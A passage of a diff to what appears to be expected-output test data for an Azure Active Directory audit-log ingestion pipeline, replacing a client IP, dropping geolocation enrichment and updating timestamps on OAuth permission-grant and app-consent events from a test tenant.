"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125374Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19339,25 +17665,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19371,7 +17679,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19510,7 +17818,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -19522,12 +17830,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036580200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125380300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19553,25 +17861,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19585,7 +17875,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19724,7 +18014,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -19736,12 +18026,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036584200Z", - "original": 